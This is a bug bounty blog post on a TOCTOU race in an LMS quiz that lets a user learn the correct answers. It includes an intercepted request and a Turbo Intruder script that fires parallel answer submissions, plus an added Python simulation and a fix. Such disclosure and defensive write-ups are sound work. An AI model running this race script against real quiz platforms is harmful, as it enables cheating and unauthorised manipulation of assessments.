the pen is mightier than the sword. (in bug hunting)

Captain hook
3 min readJul 8, 2021


Hey folks, this is Captain_hook from BC. I started my career about one and a half years ago, and I decided to share some things with ya all.

Why did I choose this title?

I wanna start with the very basic bug hunting stuff. Sometimes you find a bug that looks informational to you or to the partner, for example because you can't exploit the vulnerability, or because your report relies on the familiar sentence:

as an attacker I could..

Man, this sentence is heartbreakingly sad.

But you can actually get past this sentence. How? With a well-written report. For example, I recently found a broken flow while testing an LMS app's functionality.

Business Logic Flaw Via race condition [ TOCTOU ]

This was the title of my report. So let's break down this bug for you.

I found this bug while trying to bypass the quiz flow.
With this bug, an attacker can find the correct answers to questions without knowing them.

According to the references, TOCTOU is:

The software checks the state of a resource before using that resource, but the resource’s state can change between the check and the use in a way that invalidates the results of the check. This can cause the software to perform invalid actions when the resource is in an unexpected state.

When does the vulnerability appear?

  • As a manager, go to the app and create a test quiz.
  • Click on "add question".
  • After redirection to the quiz page, create your question. I suggest adding a True/False question.
  • After adding your question, it's time to add a participant. By adding participants, you assign the quiz to users.
  • As a normal user, click on "take exam" and you will be redirected to the question area.
  • In the question area, choose your answer (I suggest choosing the wrong answer), hit Submit and intercept the request with Burp Suite.
  • Your request should look something like this (with %s as the value of givenAnswer or a similar parameter):
POST /quizz/questions?token=Some_token&index=0 HTTP/1.1
Host: canttellu.com
Connection: keep-alive
Content-Length: 39
sec-ch-ua: "Not;A Brand";v="9", "Google Chrome";v="91", "Chromium";v="91"
Accept: application/json, text/plain, */*
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Content-Type: application/json
Origin: https://canttellu.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,fa;q=0.8,de;q=0.7
Cookie: _ga=GA1.2.2045721624.1624951867; _gid=GA1.2.563691742.1625386984
{"givenAnswer":[%s],"optionsOrder":null}
  • Send this request from Intercept to Turbo Intruder.
  • In Turbo Intruder, add this script:
def queueRequests(target, wordlists):
    # one engine, many parallel connections, so the queued requests land together
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=50,
                           requestsPerConnection=100,
                           pipeline=False
                           )
    # every line of the file becomes the %s value in the request body
    for word in open('C:\\Users\\Captain Hook\\Desktop\\01.txt'):
        engine.queue(target.req, word.rstrip())

def handleResponse(req, interesting):
    # show every response in the results table
    table.add(req)
  • Replace my file path with yours. The content of 01.txt is the list of ids assigned to the answers; in my case it was:
0
1
0
1
...
  • After hitting the Attack button, I received this response (you should receive something like this):
[Screenshot: Turbo Intruder results showing the race condition responses]

As you can see, the race condition worked! I expected one 200 and a 404 for all the other requests, but I got two 200 statuses (for both 1 and 0).

  • Check the responses of those two 200-status requests and compare them to find the correct answer to the question.
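To make the check-then-use window concrete from the defender's side, here is an added example (not code from the LMS or from this write-up) that simulates two versions of the "submit answer" handler against an in-memory answer store under parallel requests: a vulnerable one that checks "already answered?" and then records the answer, and a fixed one that collapses the check and the write into a single atomic first-writer-wins operation. The store, the handler names, the token value and the answer key are all constructed for the demo.

```python
"""
TOCTOU in a quiz-submission flow, simulated (added example, not LMS code).

submit_vulnerable: check ("already answered?") then use (record + grade),
                   with a window in between, so N parallel requests for the
                   same question all pass the check and all get a graded 200.
submit_fixed:      one atomic first-writer-wins claim, so exactly one request
                   is graded and the rest get 404.
"""
import threading

# Constructed answer key: question index -> correct option id (True/False -> 1/0).
ANSWER_KEY = {0: 1}


class AnswerStore:
    """In-memory stand-in for the answers table, guarded by one lock."""

    def __init__(self):
        self._lock = threading.Lock()
        self._answers = {}  # (token, index) -> given answer

    def get(self, key):
        with self._lock:
            return self._answers.get(key)

    def set(self, key, value):
        with self._lock:
            self._answers[key] = value

    def set_if_absent(self, key, value):
        """Atomic check-and-set: True only for the first writer of this key."""
        with self._lock:
            if key in self._answers:
                return False
            self._answers[key] = value
            return True


def grade(index, given):
    """The graded response that leaks whether the submitted option was right."""
    return {"status": 200, "correct": ANSWER_KEY[index] == given}


def submit_vulnerable(store, token, index, given, latency):
    """Check, then use: the state can change between the two steps."""
    key = (token, index)
    if store.get(key) is not None:   # check: already answered?
        return {"status": 404}
    latency()                        # window: DB round-trip, rendering, ...
    store.set(key, given)            # use: record the answer
    return grade(index, given)


def submit_fixed(store, token, index, given, latency):
    """Check and use collapsed into one atomic operation; losers get 404."""
    key = (token, index)
    won = store.set_if_absent(key, given)
    latency()                        # same delay, but the decision is already final
    if not won:
        return {"status": 404}
    return grade(index, given)


def race(handler, answers):
    """Fire one request per candidate answer at the same time; return responses."""
    store = AnswerStore()
    # The barrier stands in for "all requests arrive inside the window together".
    barrier = threading.Barrier(len(answers))
    results = [None] * len(answers)

    def worker(i, given):
        results[i] = handler(store, "Some_token", 0, given, barrier.wait)

    threads = [threading.Thread(target=worker, args=(i, a)) for i, a in enumerate(answers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def count_graded(responses):
    """How many of the parallel submissions were accepted and graded."""
    return sum(1 for r in responses if r["status"] == 200)


def leaked_correct_answers(responses, answers):
    """What the graded 200s give away: the candidates marked correct."""
    return [a for a, r in zip(answers, responses) if r["status"] == 200 and r["correct"]]


if __name__ == "__main__":
    candidates = [0, 1]
    vuln = race(submit_vulnerable, candidates)
    print("vulnerable: graded", count_graded(vuln), "leaked", leaked_correct_answers(vuln, candidates))
    fixed = race(submit_fixed, candidates)
    print("fixed:      graded", count_graded(fixed), "leaked", leaked_correct_answers(fixed, candidates))
```

With the vulnerable handler, every candidate in the list comes back as a 200 and the one marked correct stands out, which is exactly the two-200s picture from the screenshot above; with the fixed handler only one submission is graded and the others get 404, so firing both options in parallel tells the attacker nothing a single attempt would not. On a real database the atomic claim is a unique constraint on (attempt, question) with an insert that fails on conflict, or an update guarded by a "not yet answered" condition, instead of a select followed by a separate insert.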

So that was the bug, and you can use this methodology on similar LMS platforms.

So let's jump to the main idea of this article.

After reporting this issue, it was marked as informational and closed with P5 priority, but the partner responded to me with this:

So the art of explanation actually worked for me: I wrote my report with exact details and received my kudos.

Done🐱‍🏍

Conclusion

  • Use the goddamn Markdown features in your writing.
  • Break down the details and write out the attack scenario for the customer.
  • Also, you can use this methodology on similar platforms.

Thanks for your time 🐱‍👤
